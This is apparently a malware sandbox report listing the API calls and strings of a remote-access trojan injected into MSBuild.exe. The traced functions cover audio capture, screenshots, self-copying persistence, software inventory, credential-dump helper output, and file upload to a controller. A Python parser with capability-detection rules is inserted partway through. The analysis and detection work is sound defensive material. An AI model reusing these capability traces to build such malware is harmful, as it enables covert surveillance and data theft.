• API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
• String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
• API String ID: 738084811-1408154895
• Opcode ID: 488289ec40dba372481858aeedb64a88910d805c9ae5a4b7c21143b04d603b6e
• Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
• Opcode Fuzzy Hash: 488289ec40dba372481858aeedb64a88910d805c9ae5a4b7c21143b04d603b6e
• Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
• WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
• WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
• WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
• WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
• WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
• WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
• WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
• WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
• WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
• WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
• WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$Write$Create
• String ID: RIFF$WAVE$data$fmt
• API String ID: 1602526932-4212202414
• Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
• Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
• Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
• Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
• GetProcAddress.KERNEL32(00000000), ref: 004064FD
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
• GetProcAddress.KERNEL32(00000000), ref: 00406511
• GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
• GetProcAddress.KERNEL32(00000000), ref: 00406525
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
• GetProcAddress.KERNEL32(00000000), ref: 00406539
• GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
• GetProcAddress.KERNEL32(00000000), ref: 0040654D
• GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
• GetProcAddress.KERNEL32(00000000), ref: 00406561
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
• API String ID: 1646373207-89630625
• Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
• Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
• Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
• Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
APIs
• _wcslen.LIBCMT ref: 0040BC75
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
• _wcslen.LIBCMT ref: 0040BD54
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000), ref: 0040BDF2
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
• _wcslen.LIBCMT ref: 0040BE34
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
• ExitProcess.KERNEL32 ref: 0040BED0
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
• String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$del$open$BG$BG
• API String ID: 1579085052-1088133900
• Opcode ID: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
• Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
• Opcode Fuzzy Hash: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
• Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
APIs
• lstrlenW.KERNEL32(?), ref: 0041B1D6
• _memcmp.LIBVCRUNTIME ref: 0041B1EE
• lstrlenW.KERNEL32(?), ref: 0041B207
• FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
• GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
• QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
• lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
• FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
• _wcslen.LIBCMT ref: 0041B2DB
• FindVolumeClose.KERNEL32(?), ref: 0041B2FB
• GetLastError.KERNEL32 ref: 0041B313
• GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
• lstrcatW.KERNEL32(?,?), ref: 0041B359
• lstrcpyW.KERNEL32(?,?), ref: 0041B368
• GetLastError.KERNEL32 ref: 0041B370
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
• String ID: ?
• API String ID: 3941738427-1684325040
• Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
• Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
• Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
• Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3899193279-0
                                                                                                                        • Opcode ID: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                                                                                                        • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                                        • Opcode Fuzzy Hash: 6267e3def292f84dd9e33adbac7387806370fb3e846e7c9bec72720c454fd2de
                                                                                                                        • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                          • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                        • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                        • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                        • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                        • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                        • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                        • API String ID: 1223786279-3931108886
                                                                                                                        • Opcode ID: 696cd0f1f2beb549affe8c61bf5a60ef638a1338d59b97c6b305aa4f37f6b483
                                                                                                                        • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                                        • Opcode Fuzzy Hash: 696cd0f1f2beb549affe8c61bf5a60ef638a1338d59b97c6b305aa4f37f6b483
                                                                                                                        • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                                        • API String ID: 2490988753-744132762
                                                                                                                        • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                        • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                                        • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                                        • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                        • API String ID: 1332880857-3714951968
                                                                                                                        • Opcode ID: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                                                        • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                                                        • Opcode Fuzzy Hash: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                                                        • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                                                        APIs
                                                                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                                        • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                                        • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                                        • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                                        • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                                        • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                        • String ID: Close
                                                                                                                        • API String ID: 1657328048-3535843008
                                                                                                                        • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                        • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                                        • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                                        • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$Info
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2509303402-0
                                                                                                                        • Opcode ID: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                                        • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                                        • Opcode Fuzzy Hash: 92603ff5876a01059927d2e021ea2dcfde124e6bc6800bb968541682ce1897e5
                                                                                                                        • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                        • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                        • API String ID: 1884690901-3066803209
                                                                                                                        • Opcode ID: e7cb10d7a94769719a081af647e736dceef02ed1fe18e96074c9815947bd0f8d
                                                                                                                        • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                                        • Opcode Fuzzy Hash: e7cb10d7a94769719a081af647e736dceef02ed1fe18e96074c9815947bd0f8d
                                                                                                                        • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
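The per-function records above (volume enumeration, runtime lookup of getaddrinfo from ws2_32/wship6, the Uninstall-key software inventory, the /stext helper whose output is sent and deleted, and the chunked file read labelled "Uploading file to Controller") are all written in the same line format: bulleted `Api.MODULE(args), ref: address` calls, optional "Part of subcall function" lines, and `Key: value` metadata such as `API ID` and `String ID`. The following is an added example, not Joe Sandbox code and not part of this report: a small Python parser for that format plus a rule table that maps a record to the capability it implies. The sample text is assembled from lines of the records above (trimmed, not a verbatim copy), the capability labels are the author's own heuristics for this sample, and the reading of `/stext` as the NirSoft save-to-text switch is an assumption of the rule, not something the listing states.

```python
"""Parse Joe Sandbox per-function API/string records and flag capabilities.
Added example; the rule table is a heuristic written for this report, not
part of Joe Sandbox."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample assembled from lines of the records above (trimmed).
SAMPLE = """\
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall,00000000,00020019,?), ref: 0041B846
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
• RegCloseKey.ADVAPI32(?), ref: 0041BB54
Strings
• API ID: CloseEnumOpen
• String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall$UninstallString
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
• LoadLibraryA.KERNEL32(?), ref: 00413EC8
• GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
Strings
• API ID: Library$AddressFreeProc$Load$DirectorySystem
• String ID: \\ws2_32$\\wship6$freeaddrinfo$getaddrinfo$getnameinfo
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530), ref: 0041AB5F
• _wcslen.LIBCMT ref: 0041B2DB
• DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Strings
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "$HDG$HDG$>G$>G
"""

# "Api.MODULE(args), ref: addr" with optional subcall prefix; args are optional
# because CRT entries such as "_wcslen.LIBCMT ref: ..." carry none.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<val>.*)$")  # "API ID: ...", "String ID: ..."

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str
    subcall_of: str | None = None  # address of the callee when listed as a subcall

@dataclass
class Record:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)

    @property
    def strings(self) -> list[str]:
        # Joe Sandbox joins referenced strings with '$' in the String ID line.
        return [s for s in self.meta.get("String ID", "").split("$") if s]

    def api_names(self) -> set[str]:
        return {c.api for c in self.calls}

def parse_records(text: str) -> list[Record]:
    records: list[Record] = []
    cur: Record | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":            # every function record opens with this header
            cur = Record()
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue                  # "Strings", "Similarity", ... carry no data
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
            continue
        m = KV_RE.match(line)
        if m:
            cur.meta[m["key"]] = m["val"]
    return records

# (label, APIs that must all be called, substrings that must all appear in String ID)
RULES: list[tuple[str, set[str], set[str]]] = [
    ("installed-software inventory via Uninstall key",
     {"RegOpenKeyExA", "RegEnumKeyExA"}, {"CurrentVersion\\Uninstall", "DisplayName"}),
    ("runtime resolution of getaddrinfo from ws2_32/wship6",
     {"LoadLibraryA", "GetProcAddress"}, {"getaddrinfo", "ws2_32"}),
    ("volume enumeration", {"FindNextVolumeW", "GetVolumePathNamesForVolumeNameW"}, set()),
    ("chunked file read for upload", {"GetFileSizeEx", "SetFilePointerEx", "ReadFile"},
     {"Uploading file to Controller"}),
    # Assumption: /stext is the NirSoft save-to-text switch; output is sent then deleted.
    ("/stext helper output collected, sent and deleted", {"DeleteFileW", "send"}, {"/stext"}),
]

def classify(rec: Record) -> list[str]:
    apis, strings = rec.api_names(), rec.meta.get("String ID", "")
    return [label for label, need_api, need_str in RULES
            if need_api <= apis and all(s in strings for s in need_str)]

def summarize(text: str) -> list[tuple[str, list[str]]]:
    """(address of first listed call, capability labels) per record."""
    return [(r.calls[0].ref if r.calls else "?", classify(r)) for r in parse_records(text)]

if __name__ == "__main__":
    for ref, caps in summarize(SAMPLE):
        print(ref, caps)
```

Subcall lines are kept as ordinary calls tagged with `subcall_of`, so a rule can match on `send` even though the report only lists it under the helper at 00404468; drop them if you want rules to fire only on direct calls. Splitting `String ID` on `$` is lossy for strings that themselves contain `$` (the `"$HDG` entries above), which is why the rules test substrings of the raw line rather than the split list.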
                                                                                                                        APIs
                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                                        • _free.LIBCMT ref: 004500A6
                                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                        • _free.LIBCMT ref: 004500C8
                                                                                                                        • _free.LIBCMT ref: 004500DD
                                                                                                                        • _free.LIBCMT ref: 004500E8
                                                                                                                        • _free.LIBCMT ref: 0045010A
                                                                                                                        • _free.LIBCMT ref: 0045011D
                                                                                                                        • _free.LIBCMT ref: 0045012B
                                                                                                                        • _free.LIBCMT ref: 00450136
                                                                                                                        • _free.LIBCMT ref: 0045016E
                                                                                                                        • _free.LIBCMT ref: 00450175
                                                                                                                        • _free.LIBCMT ref: 00450192
                                                                                                                        • _free.LIBCMT ref: 004501AA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 161543041-0
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                                        • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                        • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                        • API String ID: 489098229-65789007
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
